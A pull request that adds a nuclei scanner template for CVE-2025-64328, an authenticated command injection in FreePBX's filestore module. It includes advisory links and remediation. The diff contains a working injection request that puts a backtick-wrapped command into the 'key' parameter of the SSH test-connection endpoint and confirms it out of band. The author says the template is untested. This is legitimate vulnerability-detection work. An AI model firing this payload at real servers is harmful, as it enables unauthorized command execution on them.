### PR TITLE
Create CVE-2025-64328 Sangoma FreePBX Authenticated Command Injection

### DIFF
--- a/http/cves/2025/CVE-2025-64328.yaml
+++ b/http/cves/2025/CVE-2025-64328.yaml
@@ -5,7 +5,11 @@ info:
   author: _th3y
   severity: critical
   description: |
-    FreePBX >= 17.0.2.36 &&  < 17.0.3 contains a command injection caused by insufficiently sanitized user-supplied data in the testconnection -> check_ssh_connect() function within the filestore module, allowing authenticated attackers execute arbitrary shell commands as the asterisk user.
+    FreePBX Endpoint Manager 17.0.2.36 to < 17.0.3 contains a command injection caused by improper sanitization in filestore module's testconnection  check_ssh_connect() function, letting authenticated users execute commands as asterisk user.
+  impact: |
+    Authenticated attackers can execute arbitrary commands as the asterisk user, gaining remote access to the system.
+  remediation: |
+    Upgrade to version 17.0.3 or later.
   classification:
     cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
     cvss-score: 8.6
@@ -44,7 +48,7 @@ flow: http(1) && http(2)
 
 http:
   - method: POST
-    path: 
+    path:
       - "{{BaseURL}}/admin/config.php"
     headers:
       Content-Type: application/x-www-form-urlencoded
@@ -58,13 +62,13 @@ http:
           - 'Hello, {{username}}'
         condition: and
         internal: true
-  
+
   - method: GET
     path:
       - "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}"
     headers:
       Referer: "{{BaseURL}}"
-    
+
     matchers:
       - type: word
         part: interactsh_protocol


### PR DESCRIPTION
Added CVE-2025-64328

### PR Information

Hello :wave:, this is my first PR to `nuclei-templates`. I am adding a template for CVE-2025-64328, an authenticated command injection I reported a couple months ago in Sangoma FreePBX that was recently exploited in the wild.

References:
- https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
- https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
- https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog
- https://thehackernews.com/2026/02/900-sangoma-freepbx-instances.html

This template is also available in my repository I created for proof of concepts for this vulnerability:
- https://github.com/mcorybillington/CVE-2025-64328_FreePBX-framework-Command-Injection

### Template validation

I apologize I don't have this data. I did test it a few months ago when I released the blog post but unfortunately have since tore down the test instance. I will try and stand up another instance in the near future, but I'd also be happy to collaborate if someone else would like to do so.

#### Additional Details (leave it blank if not applicable)


### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
